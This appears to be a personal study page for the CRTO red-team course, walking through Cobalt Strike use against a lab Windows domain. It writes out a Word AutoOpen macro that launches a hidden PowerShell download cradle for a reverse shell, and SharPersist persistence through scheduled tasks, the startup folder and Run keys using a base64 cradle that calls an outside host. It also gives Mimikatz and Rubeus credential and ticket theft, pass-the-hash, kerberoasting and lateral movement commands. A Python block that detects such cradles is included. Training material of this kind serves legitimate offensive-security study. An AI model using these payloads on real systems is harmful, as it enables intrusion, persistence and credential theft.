# CRTO & Cobalt Strike

## Setting Up Cobalt Strike on Windows Machine

To start Cobalt Strike we need two things:

1. Team Server (this is only ever run on the Linux machine)
2. Cobalt Strike Client

### Setting Up TeamServer

First, we need a Linux box on which the team server will run. I already have one, so I will open my Linux box from the Windows machine and then run the team server:

```
sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile
```

* `10.10.5.50` is the IP address of the Attacker Linux VM.
* `Passw0rd!` is the shared password used to connect from the Cobalt Strike client.
* `webbug.profile` is an example Malleable C2 profile (covered in more detail later).

<figure><img src="/files/nbV7hQY2AFNcc5QHSxDn" alt=""><figcaption></figcaption></figure>

Now the team server is up and running, so we need to start the Cobalt Strike client.

### Starting Cobalt Strike Client

After the team server is started, we need to start the Cobalt Strike client and provide the connection details:

<figure><img src="/files/cEBujnUMMkelOm1vktST" alt=""><figcaption></figcaption></figure>

1. I added a random alias.
2. Host should be the one where the team server is running.
3. You can add any username.
4. Password should be the same one you chose when starting the team server.

<figure><img src="/files/Z3PT1g2ifo6vsFm81mj0" alt=""><figcaption><p>Cobalt Strike Started Successfully</p></figcaption></figure>

## Listeners in Cobalt Strike

We can set up listeners in Cobalt Strike by pressing the headphones button at the top.

<figure><img src="/files/uXWco6coDvNn9GsWeEaB" alt=""><figcaption></figcaption></figure>

Now we can click the Add button at the bottom and add listeners. We can set up:

1. http
2. dns
3. https
4. smb

Below is an example of the HTTP listener.

<figure><img src="/files/eLEs4FaEmWoi9mnR6aI1" alt=""><figcaption></figcaption></figure>

In the same way we can set up all the other listeners.

### SMB Listener

For the SMB listener we can look at the named pipes on our own system and pick one of those found. We will not use the Cobalt Strike default pipe name, because it is easily detected by AVs.

<figure><img src="/files/hgi5c3QaimbTiGbXTDVw" alt=""><figcaption></figcaption></figure>

We can use any of the above and set up the listener.

## All Listeners Set Up

<figure><img src="/files/wgziXN8ollz1RJ7GDT4f" alt=""><figcaption></figcaption></figure>

## Running Cobalt Strike As a Service

We can run Cobalt Strike as a service so that once our Linux machine starts we don't need to run the team server again and again.

First we need to create a file in `/etc/systemd/system`:

```
sudo nano /etc/systemd/system/teamserver.service
```

then add the following content to it:

```
[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target
```

<figure><img src="/files/JJ0P2IUxYwfZYLM55ghK" alt=""><figcaption></figcaption></figure>

Now we need to reload the system manager:

```
sudo systemctl daemon-reload
```

Now let's see the status of the teamserver service we created:

```
sudo systemctl status teamserver.service
```

<figure><img src="/files/vZQd7TXdurpXwBCnAvDO" alt=""><figcaption></figcaption></figure>

Now let's start the teamserver service:

```
sudo systemctl start teamserver.service
```

and let's enable the teamserver service as well:

```
sudo systemctl enable teamserver.service
```

Now every time the Linux machine starts, the teamserver service will run automatically.

<figure><img src="/files/9IvTXdFR17kOImJhxVmt" alt=""><figcaption><p>Cobalt Strike Teamserver started successfully</p></figcaption></figure>

## Generating All Payloads using Cobalt Strike

We can generate all payloads in Cobalt Strike; I will choose the last option, **Windows Stageless Generate All Payloads**.

<figure><img src="/files/Uw1U4Qxu7cUdJ40RVTxG" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/gDuqzwUT3Wc2aTleDxgL" alt=""><figcaption></figcaption></figure>

Now all the payloads will be generated in `C:\Payloads`.

<figure><img src="/files/ynrEJ5aS6Zy8I9Yibebb" alt=""><figcaption></figcaption></figure>

## Creating Macro With Cobalt Strike

We can open Word and go to **View->Macros->Create Macro**.

Make sure you name the macro **AutoOpen** and select Document1 from the drop-down.

<figure><img src="/files/fy65J9DwIKofxX1i1XGm" alt=""><figcaption></figcaption></figure>

Now I will write a small macro that opens Notepad:

```
Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "notepad"

End Sub
```

Then we need to save it and run it, and we will see Notepad running.

<figure><img src="/files/om8alWJytTSbLYGd7VtI" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/pjbxaXiX6njAJZOMo15K" alt=""><figcaption></figcaption></figure>

### Macro For Reverse Shell in Cobalt Strike

Now I will use the Cobalt Strike Scripted Web Delivery to host a payload and get a reverse shell.

<figure><img src="/files/nGVOptJQV0NM1O2FUWME" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/sMRFJhqDJi2odhqFlKYP" alt=""><figcaption></figcaption></figure>

Now my payload is hosted and I get the following command, which we can insert in the macro, and once the macro

```
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.50:80/a'))"
```

<figure><img src="/files/gtnp5cnuX3igCUe85JUn" alt=""><figcaption></figcaption></figure>

Below is how the final code will look; **make sure you use two double quotes to escape each inner double quote**.

```
Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.50:80/a'))"""

End Sub
```

<figure><img src="/files/RZXSvMUhN2Id9YuoF6Gp" alt=""><figcaption></figcaption></figure>

In Site Management I can see that my payload is hosted and listening on port 80.

<figure><img src="/files/qWpdObFizIqp4DotUbLP" alt=""><figcaption></figcaption></figure>

Once someone opens the document and the macro runs, I will get a reverse shell in my Cobalt Strike.

<figure><img src="/files/EiLaJ1ErX0oqBJUlOHKV" alt=""><figcaption></figcaption></figure>

## Cobalt Strike Commands

* `ps`: list the running processes, so we can spot AV or endpoint-protection processes.
* `execute-assembly <executable-file>`: run a .NET executable from memory, for example `execute-assembly seatbelt.exe -group=system`.
* `screenshot`: take a screenshot.
* `keylogger`: record what the target user is typing.
* `clipboard`: show what the user has copied to the clipboard (text only, not images).
* `net logons`: show which users have logged into the system, in the past and currently.

## Persistence Techniques

Persistence is a method of regaining or maintaining access to a compromised machine, without having to exploit the initial compromise steps all over again. Workstations are volatile since users tend to logout or reboot them frequently.

If you've gained initial access through a phishing campaign, it's unlikely you'll be able to do so again if your current Beacon is lost, which could be the end of the engagement. If you're on an assume-breach (or indeed in this lab) and have access to an internal host, the loss of complete access to the environment is less of a concern. However, you may still need to drop one or more persistence mechanisms on hosts you control if your simulated threat would also do so.

**Common userland persistence methods include:**

* **HKCU / HKLM Registry Autoruns**
* **Scheduled Tasks**
* **Startup Folder**

**Cobalt Strike doesn't include any built-in commands specifically for persistence.** [**SharPersist**](https://github.com/fireeye/SharPersist) **is a Windows persistence toolkit written by FireEye. It's written in C#, so can be executed via `execute-assembly`.**

### Persistence using Task Scheduler

The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or a combination thereof.

I will first convert the PowerShell download cradle to base64 so I can get rid of the double-quote and special-character problem:

```
$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'

[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
```

<figure><img src="/files/OsnbN6kMkjvti0GMoHcb" alt=""><figcaption></figcaption></figure>

Now I will use SharPersist:

```
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly
```
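As an added, defender-side example (not Cobalt Strike or SharPersist code), the following Python decodes a `-enc` payload the way an analyst would when a command line like the one above turns up in a process-creation event, a scheduled-task action or a Run-key value, and flags the download-cradle indicators seen in the macro and SharPersist commands on this page. The sample command lines are constructed from values on this page; the benign backup-script path is made up.

```python
"""Triage PowerShell command lines from process-creation events, scheduled-task
actions or Run-key values: decode -EncodedCommand payloads and flag
download-cradle indicators. Added example, not Cobalt Strike/SharPersist code."""
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match
# -e / -ec / -enc / -encodedcommand followed by a base64 blob.
ENC_RE = re.compile(
    r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+\"?([A-Za-z0-9+/=]{8,})\"?",
    re.IGNORECASE,
)

# Strings that almost always mean "download and execute in memory".
STRONG = ("invoke-expression", "iex", "downloadstring", "downloadfile",
          "net.webclient", "frombase64string")
# Launch options that hide the console; weak alone, telling when combined.
WEAK = ("-nop", "-w hidden", "-windowstyle hidden", "-noni",
        "-ep bypass", "-executionpolicy bypass")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind -enc, or None if absent or not decodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return None
    if len(raw) % 2:          # UTF-16LE needs an even byte count
        return None
    return raw.decode("utf-16-le", errors="replace")


def triage(cmdline: str) -> dict:
    """Decode the command line and report which indicators it contains."""
    decoded = decode_encoded_command(cmdline)
    haystack = (cmdline + " " + (decoded or "")).lower()
    strong = [s for s in STRONG if s in haystack]
    weak = [w for w in WEAK if w in haystack]
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "strong": strong,
        "weak": weak,
        # A cradle indicator anywhere, or an encoded payload launched hidden,
        # deserves an analyst's attention.
        "suspicious": bool(strong) or (decoded is not None and bool(weak)),
    }


# Constructed samples: the SharPersist scheduled-task action and the macro
# cradle from this page, plus a benign scripted backup for contrast.
ENCODED_BLOB = "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA"
SAMPLE_SCHTASK = ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
                  f"-nop -w hidden -enc {ENCODED_BLOB}")
SAMPLE_MACRO = ("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient)"
                ".downloadstring('http://10.10.5.50:80/a'))\"")
SAMPLE_BENIGN = "powershell.exe -File C:\\scripts\\nightly-backup.ps1"

if __name__ == "__main__":
    for sample in (SAMPLE_SCHTASK, SAMPLE_MACRO, SAMPLE_BENIGN):
        report = triage(sample)
        print(f"suspicious={report['suspicious']} strong={report['strong']} "
              f"weak={report['weak']} decoded={report['decoded']!r}")
```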

<figure><img src="/files/pw9LlsMlmST6WM9I5TVu" alt=""><figcaption></figcaption></figure>

I can confirm this on the target system as well by opening the Task Scheduler.

<figure><img src="/files/LtChzB9wdnoT02BywPTr" alt=""><figcaption></figcaption></figure>

### Persistence Using Startup Folder

Applications, files and shortcuts within a user's startup folder are launched automatically when they first log in. It's commonly used to bootstrap the user's home environment (set wallpapers, shortcuts, etc.).

```
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add
```

<figure><img src="/files/yPrkiiX2Degs7lk5T81H" alt=""><figcaption></figcaption></figure>

We can go to the startup folder on the target machine to confirm:

```
C:\Users\Programmerboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
```

<figure><img src="/files/WUG3BVGcm7WA0MtsFlGH" alt=""><figcaption><p>Our Startup Reverse shell is Present</p></figcaption></figure>

### Persistence Using Registry AutoRuns

AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.

For this we need to upload our exe file to the target machine and then set it to run on every boot.

<figure><img src="/files/4Mvm6ivyY5OWqaIfQmQH" alt=""><figcaption><p>I will rename this to updater.exe</p></figcaption></figure>

```
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
```

<figure><img src="/files/0QtDAiUvqdEqgu3mjqt1" alt=""><figcaption></figcaption></figure>

## Mimikatz in Cobalt Strike

Cobalt Strike has a built-in version of Mimikatz that we can use to extract various credential types. However, there are some differences with how it behaves in Beacon compared to the console version. Each time you execute Mimikatz in Beacon, it does so in a new temporary process which is then destroyed. This means you can't run two "related" commands, such as:

```
beacon> mimikatz token::elevate
beacon> mimikatz lsadump::sam
```

Since CS 4.8, you can chain multiple commands together by separating them with a semi-colon.

```
beacon> mimikatz token::elevate ; lsadump::sam
```

The `!` elevates Beacon to SYSTEM before running the given command, which is useful in cases where you're running in high-integrity but need to impersonate SYSTEM.  In most cases, `!` is a direct replacement for `token::elevate`. For example:

```
beacon> mimikatz !lsadump::sam
```

### NTLM Hashes

```
beacon> mimikatz !sekurlsa::logonpasswords
```

We can also use the shorthand command for this in Cobalt Strike:

```
logonpasswords
```

<figure><img src="/files/doGQtuS1qpoMlNKO7Yq6" alt=""><figcaption></figcaption></figure>

### Kerberos Encryption keys

```
beacon> mimikatz !sekurlsa::ekeys
```

<figure><img src="/files/T42aeiOOdvLFBwnZ3QKa" alt=""><figcaption></figcaption></figure>

### SAM File

The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only.  These can be extracted with the `lsadump::sam` Mimikatz module.  If a common local administrator account is being used with the same password across an entire environment, this can make it very trivial to move laterally.

```
beacon> mimikatz !lsadump::sam
```

<figure><img src="/files/QglzugzjT775rN3848B5" alt=""><figcaption></figcaption></figure>

### Domain Cached Creds

Unfortunately, the hash format is not NTLM so it can't be used with pass the hash.  The only viable use for these is to crack them offline.

The `lsadump::cache` Mimikatz module can extract these from `HKLM\SECURITY`.

```
mimikatz !lsadump::cache
```

To crack these with [hashcat](https://hashcat.net/hashcat/), we need to transform them into the expected format. The [example hashes page](https://hashcat.net/wiki/doku.php?id=example_hashes) shows us it should be `$DCC2$<iterations>#<username>#<hash>`.

### Extracting Kerberos Tickets

One unfortunate consequence of the aforementioned techniques is that they obtain handles to sensitive resources, which can be audited and logged quite easily.  [Rubeus](https://github.com/GhostPack/Rubeus) is a C# tool designed for Kerberos interaction and abuses, using legitimate Windows APIs.

Its `triage` command will list all the Kerberos tickets in your current logon session and if elevated, from all logon sessions on the machine.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
```

Rubeus' `dump` command will extract these tickets from memory - but because it uses WinAPIs, it does not need to open suspicious handles to LSASS.  If not elevated, we can only pull tickets from our own session.  Without any further arguments, Rubeus will extract all tickets possible, but we can be more specific by using the `/luid` and `/service` parameters.

For example, if we only wanted the TGT for jking, we can do:

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt
```

### DCSync

The [Directory Replication Service (MS-DRSR) protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47) is used to synchronise and replicate Active Directory data between domain controllers.  DCSync is a technique which leverages this protocol to extract username and credential data from a DC.

Beacon has a dedicated `dcsync` command, which calls `mimikatz lsadump::dcsync` in the background.

## Domain Reconnaissance

### PowerView

First we import it into memory:

```
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
```

We can run the following commands to enumerate the domain.

**To Get Information about the domain**

```
beacon> powershell Get-Domain
```

**Returns the domain controllers for the current or specified domain.**

```
beacon> powershell Get-DomainController | select Forest, Name, OSVersion | fl
```

**Returns all domains for the current forest or the forest specified by `-Forest`.**

```
beacon> powershell Get-ForestDomain
```

**Returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. Useful for finding information such as the domain password policy.**

```
beacon> powershell Get-DomainPolicyData | select -expand SystemAccess
```

**Return all (or specific) user(s). To only return specific properties, use `-Properties`. By default, all user objects for the current domain are returned, use `-Identity` to return a specific user.**

```
beacon> powershell Get-DomainUser -Identity jking -Properties DisplayName, MemberOf | fl
```

**Return all computers or specific computer objects.**

```
beacon> powershell Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
```

**Search for all organization units (OUs) or specific OU objects.**

```
beacon> powershell Get-DomainOU -Properties Name | sort -Property Name
```

**Return all domain groups or specific domain group objects.**

```
beacon> powershell Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
```

**Return the members of a specific domain group.**

```
beacon> powershell Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
```

**Return all Group Policy Objects (GPOs) or specific GPO objects. To enumerate all GPOs that are applied to a particular machine, use `-ComputerIdentity`.**

```
beacon> powershell Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
```

**Returns all GPOs that modify local group membership through Restricted Groups or Group Policy Preferences. You can then manually find which OUs, and by extension which computers, these GPOs apply to.**

```
beacon> powershell Get-DomainGPOLocalGroup | select GPODisplayName, GroupName
```

**Enumerates the machines where a specific domain user/group is a member of a specific local group. This is useful for finding where domain groups have local admin access, which is a more automated way to perform the manual cross-referencing described above.**

```
beacon> powershell Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
```

**Return all domain trusts for the current or specified domain**

```
beacon> powershell Get-DomainTrust
```

## User Impersonation

### Pass The Hash Attack

If we have the NTLM hash of a user, we can use Cobalt Strike to perform a pass-the-hash attack. After passing the hash we can try to list the C$ share of another computer to see whether we can access it or not.

```
beacon> pth DEV\jking 59fc0f884922b4ce376051134c71e22c
```

### Pass the Ticket

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP
```

## Lateral Movement

Moving laterally between computers in a domain is important for accessing sensitive information/materials, and obtaining new credentials.  Cobalt Strike provides three strategies for executing Beacons/code/commands on remote targets.

The first and most convenient is to use the built-in `jump` command - the syntax is `jump [method] [target] [listener]`.  Type `jump` to see a list of methods.  This will spawn a Beacon payload on the remote target, and if using a P2P listener, will connect to it automatically.

The second strategy is to use the built-in `remote-exec` command - the syntax is `remote-exec [method] [target] [command]`.  Type `remote-exec` to see a list of methods.

Each of these strategies is compatible with the various techniques described in the **User Impersonation** chapter.  For example, you can use `pth` to impersonate a user and then `jump` to move laterally.

### Remote-exec

```
beacon> remote-exec winrm web.dev.cyberbotic.io whoami
```

### Jump

```
beacon> jump winrm64 web.dev.cyberbotic.io smb
```

```
beacon> jump psexec64 web.dev.cyberbotic.io smb
```

```
beacon> jump psexec_psh web smb
```

## Kerberoasting Using Cobalt Strike

We can use **Rubeus** to find kerberoastable users and request their TGSs; the command below will find all kerberoastable users and return a TGS for each:

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
```

A much safer approach is to enumerate possible candidates first and roast them selectively. This LDAP query will find domain users who have an SPN set.

```
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
```

We can also target a specific user for kerberoasting, roasting an individual account with the `/user` parameter:

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap
```

## AS-REP Roasting Using Cobalt Strike

If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password.

As with kerberoasting, we don't want to asreproast every account in the domain.

```
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
```

We can use the command below with Rubeus to AS-REP roast the user `squid_svc`:

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap
```

## Unconstrained Delegation Using Cobalt Strike

This query will return all computers that are permitted for unconstrained delegation.

```
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
```

Rubeus `triage` will show all the tickets that are currently cached.  TGTs can be identified by the krbtgt service.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
```

We can simply extract this TGT and leverage it via a new logon session.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap
```

## Microsoft Defender and Bypass

### Command to Check for Malicious File Detections

```
# In Powershell

Get-MpThreatDetection | Sort-Object InitialDetectionTime | Select-Object -First 5
```

<figure><img src="/files/qoZaBWDY8lqnNloDngse" alt=""><figcaption></figcaption></figure>

